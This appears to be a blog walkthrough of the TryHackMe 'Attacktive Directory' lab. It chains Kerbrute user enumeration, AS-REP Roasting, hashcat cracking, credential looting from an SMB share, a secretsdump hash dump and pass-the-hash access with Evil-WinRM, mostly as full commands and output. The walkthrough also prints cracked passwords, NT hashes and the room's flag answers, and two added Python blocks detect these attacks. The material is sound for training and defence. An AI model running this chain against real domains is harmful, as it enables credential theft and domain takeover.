Hi everyone! Today's post is on the TryHackMe challenge Attacktive Directory, which will introduce you to Kerberos user enumeration with Kerbrute against a Domain Controller (DC), AS-REP Roasting with GetNPUsers against the DC, cracking Kerberos hashes with Hashcat, dumping password hashes from the DC, and using Evil-WinRM to access the DC. Let's get started!
1. Deploy the machine
You can use Kali Linux, Parrot OS, or TryHackMe (THM)'s attack machine to attack the Domain Controller (DC).
2. Setup
Impacket installation
Impacket has always been difficult to install correctly; a missed step often results in a bunch of errors when running its tools. Thus, TryHackMe (THM) provided steps to install it correctly. If you are using THM's attack machine, Impacket and Bloodhound are already installed.
Firstly, we have to clone Impacket from the GitHub repository.
kali@kali~$ sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
Next, we shall install the requirements.
kali@kali~$ sudo pip3 install -r /opt/impacket/requirements.txt
Finally, we can run the Python installation script.
kali@kali~$ cd /opt/impacket/ && sudo python3 ./setup.py install
3. Welcome to Active Directory
We first use nmap to check out the services available on the Domain Controller (DC). In this simple lab setup, only the DC is available. Of course, in other Active Directory (AD) environments we may have to enumerate and attack other workstations before we have a shot at accessing the DC.
kali@kali~$ sudo nmap -sC -sV -n -p- 10.10.6.165
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-11 22:05 EST
Nmap scan report for 10.10.139.4
Host is up (0.36s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-12 07:17:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| DNS_Tree_Name: spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-01-12T07:18:14+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-01-11T06:34:36
|_Not valid after: 2022-07-13T06:34:36
|_ssl-date: 2022-01-12T07:18:26+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
We can also use enum4linux on ports 139/445 to enumerate NetBIOS for information such as existing usernames, the NetBIOS domain name, the domain SID, etc.
kali@kali~$ enum4linux 10.10.6.165
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jan 11 22:10:14 2022

==========================
| Target Information |
==========================
Target ........... 10.10.6.165
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

===================================================
| Enumerating Workgroup/Domain on 10.10.6.165 |
===================================================
[E] Can't find workgroup/domain

===========================================
| Nbtstat Information for 10.10.6.165 |
===========================================
Looking up status of 10.10.6.165
No reply from 10.10.6.165

====================================
| Session Check on 10.10.6.165 |
====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.139.4 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

==========================================
| Getting domain SID for 10.10.6.165 |
==========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
...
Questions and answers
What tool will allow us to enumerate port 139/445?
enum4linux
What is the NetBIOS-Domain Name of the machine?
THM-AD
What invalid TLD do people commonly use for their Active Directory Domain?
.local
4. Enumerating Users via Kerberos
TryHackMe (THM) recommends using Kerbrute for this challenge to brute force Kerberos (the key authentication service in Active Directory) in order to enumerate usernames and passwords. A modified username list and password list have been provided to us. Note that brute forcing credentials is generally not recommended in practice because of account lockout policies.
Firstly, I downloaded Kerbrute onto my Kali machine and made it executable.
kali@kali~$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
kali@kali~$ chmod +x kerbrute_linux_amd64
Next, I downloaded both the user list and password list.
kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
We can now check out the usage of the tool and use it on the Domain Controller (DC).
kali@kali~$ ./kerbrute_linux_amd64 --help
...
Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int       Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string   The full domain to use (e.g. contoso.com)
  -h, --help            help for kerbrute
  -o, --output string   File to write logs to. Optional.
      --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int     Threads to use (default 10)
  -v, --verbose         Log failures and errors

kali@kali~$ ./kerbrute_linux_amd64 userenum --dc=10.10.6.165 -d=spookysec.local. userlist.txt
...
Version: v1.0.3 (9dad6e1) - 01/11/22 - Ronnie Flathers @ropnop

2022/01/11 22:53:06 > Using KDC(s):
2022/01/11 22:53:06 > 10.10.6.165:88
2022/01/11 22:53:07 > [+] VALID USERNAME: james@spookysec.local.
2022/01/11 22:53:13 > [+] VALID USERNAME: svc-admin@spookysec.local.
2022/01/11 22:53:21 > [+] VALID USERNAME: James@spookysec.local.
2022/01/11 22:53:24 > [+] VALID USERNAME: robin@spookysec.local.
2022/01/11 22:53:54 > [+] VALID USERNAME: darkstar@spookysec.local.
2022/01/11 22:54:13 > [+] VALID USERNAME: administrator@spookysec.local.
2022/01/11 22:54:50 > [+] VALID USERNAME: backup@spookysec.local.
2022/01/11 22:55:08 > [+] VALID USERNAME: paradox@spookysec.local.
Questions and answers
What command within Kerbrute will allow us to enumerate valid usernames?
userenum
What notable account is discovered? (These should jump out at you)
svc-admin
What is the other notable account is discovered? (These should jump out at you)
backup
5. Abusing Kerberos
In this challenge, we can perform AS-REP Roasting because one or more user accounts do not require Kerberos pre-authentication before requesting a ticket. Thus, we can use Impacket's /opt/impacket/examples/GetNPUsers.py to query AS-REP roastable accounts from the Key Distribution Center (KDC). However, we need to provide a list of usernames; since we already enumerated the valid usernames, we can use those.
In my validusers.txt:
james
svc-admin
James
robin
darkstar
administrator
backup
paradox
Obtaining the AS-REP roastable accounts:
kali@kali~$ python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip 10.10.6.165 spookysec.local/
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566
[-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
We can see that only svc-admin can request a ticket without first proving knowledge of its password.
A quick Google search shows that we should use hashcat mode 18200 to crack this hash.
kali@kali~$ hashcat -h | grep 18200
  18200 | Kerberos 5, etype 23, AS-REP | Network Protocols
Finally, we can attempt to crack the password of svc-admin using hashcat. I first stored the hash in hash.txt and then cracked it with the password list downloaded earlier.
kali@kali~$ cat hash.txt
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566
kali@kali~$ hashcat -m18200 hash.txt passwordlist.txt
...
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566:management2005
It should only take a few seconds to crack the hash on a Kali virtual machine. If you do it on your Windows host, it will be even faster. We should obtain the password "management2005".
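The detection side of the two steps above (Kerbrute user enumeration and AS-REP Roasting), as an added example that is not part of the TryHackMe room, Kerbrute or Impacket: it runs two checks over constructed Windows Security event 4768 (Kerberos TGT requested) records, assuming only that event's real field names (TargetUserName, IpAddress, Status, PreAuthType, TicketEncryptionType). The thresholds are assumptions to tune per environment.

```python
"""Added detection example; not from the TryHackMe room, Kerbrute or Impacket.
Scans Windows Security event 4768 (a Kerberos TGT was requested) records for
Kerbrute-style username enumeration and AS-REP Roasting. Records are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Field names follow the 4768 event schema; the values below are constructed.
#   Status 0x6           = KDC_ERR_C_PRINCIPAL_UNKNOWN (the username does not exist)
#   PreAuthType 0        = logon without Kerberos pre-authentication
#   TicketEncryptionType = 0x17 RC4-HMAC (etype 23), 0x12 AES256, 0xffffffff on failure
def ev(time, user, ip, status, preauth, etype):
    return {"time": datetime.fromisoformat(time), "TargetUserName": user,
            "IpAddress": ip, "Status": status, "PreAuthType": preauth,
            "TicketEncryptionType": etype}

SAMPLE_EVENTS = [
    # wordlist run from one host: five non-existent names within a few seconds
    ev("2022-01-11T22:53:06", "aaron", "10.50.1.9", "0x6", "-", "0xffffffff"),
    ev("2022-01-11T22:53:06", "abby", "10.50.1.9", "0x6", "-", "0xffffffff"),
    ev("2022-01-11T22:53:07", "adam", "10.50.1.9", "0x6", "-", "0xffffffff"),
    ev("2022-01-11T22:53:08", "alex", "10.50.1.9", "0x6", "-", "0xffffffff"),
    ev("2022-01-11T22:53:09", "amy", "10.50.1.9", "0x6", "-", "0xffffffff"),
    # the same host later obtains an RC4 TGT for svc-admin with no pre-authentication
    ev("2022-01-11T22:58:40", "svc-admin", "10.50.1.9", "0x0", "0", "0x17"),
    # ordinary workstation: one typo, then a normal AES logon with pre-authentication
    ev("2022-01-11T22:55:01", "robn", "10.50.1.20", "0x6", "-", "0xffffffff"),
    ev("2022-01-11T22:55:09", "robin", "10.50.1.20", "0x0", "2", "0x12"),
]

def detect_user_enumeration(events, threshold=5, window=timedelta(minutes=2)):
    """Return {source ip: sorted unknown usernames} for hosts that asked the KDC
    about at least `threshold` distinct non-existent users inside one `window`."""
    probes = defaultdict(list)
    for e in events:
        if e["Status"] == "0x6":
            probes[e["IpAddress"]].append((e["time"], e["TargetUserName"]))
    flagged = {}
    for ip, hits in probes.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):      # sliding window from each probe
            names = {n for t, n in hits[i:] if t - start <= window}
            if len(names) >= threshold:
                flagged[ip] = sorted(names)
                break
    return flagged

def detect_asrep_roasting(events):
    """Return (user, ip) pairs issued an RC4 TGT with no pre-authentication: the
    accounts GetNPUsers collects and hashcat mode 18200 cracks. Any hit means
    UF_DONT_REQUIRE_PREAUTH is set on that account and should be reviewed."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e["Status"] == "0x0" and e["PreAuthType"] == "0"
            and e["TicketEncryptionType"] == "0x17"]

if __name__ == "__main__":
    print("user enumeration:", detect_user_enumeration(SAMPLE_EVENTS))
    print("AS-REP roastable:", detect_asrep_roasting(SAMPLE_EVENTS))
```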
Questions and answers
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
svc-admin
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Kerberos 5, etype 23, AS-REP
What mode is the hash?
18200
Now crack the hash with the modified password list provided, what is the user accounts password?
management2005
6. Back to the Basics
We can now attempt to enumerate SMB shared folders using our newly found credentials.
kali@kali~$ smbclient -L 10.10.6.165 -U "svc-admin"
Enter WORKGROUP\svc-admin's password: management2005

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backup          Disk
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
Going through each shared folder, I found one I could log in to, and it contained an interesting text file.
kali@kali~$ smbclient \\\\10.10.6.165\\backup -U "svc-admin"
Enter WORKGROUP\svc-admin's password: management2005
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020
I downloaded the text file and looked at its content.
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit
kali@kali~$ cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
It looks like it is base64 encoded; decoding it reveals a valid credential.
kali@kali~$ base64 -d backup_credentials.txt
backup@spookysec.local:backup2517860
Questions and answers
What utility can we use to map remote SMB shares?
smbclient
Which option will list shares?
-L
How many remote shares is the server listing?
6
There is one particular share that we have access to that contains a text file. Which share is it?
backup
What is the content of the file?
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
Decoding the contents of the file, what is the full contents?
backup@spookysec.local:backup2517860
7. Elevating Privileges within the Domain
Obtaining the credentials of backup gives us more privileges on the Domain Controller (DC). This is because any change made in Active Directory (AD) is replicated to this backup account, which means it can read every user's password hash. To dump them, we can use Impacket's secretsdump.py.
kali@kali~$ python3 /opt/impacket/examples/secretsdump.py spookysec.local/backup:backup2517860@10.10.6.165
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:bf23f4f1cf41c6f75b54f6acb6c90226:::
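Two defender-side checks for this step, as an added example that is not from the TryHackMe room or Impacket: a detector for the directory-replication access that secretsdump's DRSUAPI method relies on, run over constructed Windows Security event 4662 records (the field names and the two replication-right GUIDs are the real ones; the records are made up), and a password-reuse check over lines copied from the secretsdump output above.

```python
"""Added example; not from the TryHackMe room or Impacket. Flags replication
(DRSUAPI-style) access by non-DC principals in event 4662 records, and finds
NT hashes shared between accounts in dumped NTDS.DIT lines."""
from collections import defaultdict

# Control-access rights a principal must hold to pull secrets through DRSUAPI.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}

def ev(user, access_mask, properties):
    """Constructed 4662 record using the event's real field names."""
    return {"SubjectUserName": user, "AccessMask": access_mask, "Properties": properties}

SAMPLE_4662 = [
    # the DC's own computer account replicating: expected behaviour
    ev("ATTACKTIVEDIREC$", "0x100", "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                                    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # a user account exercising both replication rights: secretsdump-style pull
    ev("backup", "0x100", "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                          "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # an ordinary property read (AccessMask 0x10) on a placeholder attribute GUID
    ev("svc-admin", "0x10", "{00000000-0000-0000-0000-000000000000}"),
]

def detect_replication_access(events, dc_accounts):
    """Return (account, [rights]) for 4662 records in which anyone other than a
    domain controller account exercised a replication control-access right."""
    hits = []
    for e in events:
        if e["AccessMask"] != "0x100":          # 0x100 = Control Access (extended right)
            continue
        props = e["Properties"].lower()
        rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        if rights and e["SubjectUserName"].upper() not in dc_accounts:
            hits.append((e["SubjectUserName"], rights))
    return hits

# Lines copied from the secretsdump output above (domain\uid:rid:lmhash:nthash:::).
DUMP_LINES = [
    r"Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::",
    r"spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::",
    r"spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::",
    r"spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::",
    r"spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::",
]

def shared_nt_hashes(lines):
    """Group dump lines by NT hash and return only hashes held by more than one
    account, i.e. a password reused between accounts (one of them privileged here)."""
    by_hash = defaultdict(list)
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) < 4 or len(parts[3]) != 32:
            continue                              # not a domain\uid:rid:lm:nt line
        by_hash[parts[3]].append(parts[0].rsplit("\\", 1)[-1])
    return {h: users for h, users in by_hash.items() if len(users) > 1}

if __name__ == "__main__":
    print(detect_replication_access(SAMPLE_4662, {"ATTACKTIVEDIREC$"}))
    print(shared_nt_hashes(DUMP_LINES))
```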
Finally, we need to install evil-winrm to access the system, since port 5985 (WinRM) is open.
kali@kali~$ sudo gem install evil-winrm
Questions and answers
What method allowed us to dump NTDS.DIT?
DRSUAPI
What is the Administrators NTLM hash?
0e0363213e37b94221497260b0bcb4fc
What method of attack could allow us to authenticate as the user without the password?
pass the hash
Using a tool called Evil-WinRM what option will allow us to use a hash?
-H
8. Flag submission panel
Submit the flags for each user account. They are located on each user's desktop. We can simply log in to the Administrator account, which has access to the other users' desktops.
kali@kali~$ evil-winrm -i 10.10.6.165 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
...
*Evil-WinRM* PS C:\Users\Administrator\Documents>
We can now visit each user's desktop to obtain their flag.
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\svc-admin\Desktop
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> dir

    Directory: C:\Users\svc-admin\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:18 PM             28 user.txt.txt

*Evil-WinRM* PS C:\Users\svc-admin\Desktop> type user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> cd C:\Users\backup\Desktop
*Evil-WinRM* PS C:\Users\backup\Desktop> dir

    Directory: C:\Users\backup\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:19 PM             26 PrivEsc.txt

*Evil-WinRM* PS C:\Users\backup\Desktop> type PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}
*Evil-WinRM* PS C:\Users\backup\Desktop> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  11:39 AM             32 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
TryHackMe{4ctiveD1rectoryM4st3r}
Questions and answers
svc-admin
TryHackMe{K3rb3r0s_Pr3_4uth}
backup
TryHackMe{B4ckM3UpSc0tty!}
Administrator
TryHackMe{4ctiveD1rectoryM4st3r}
I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here.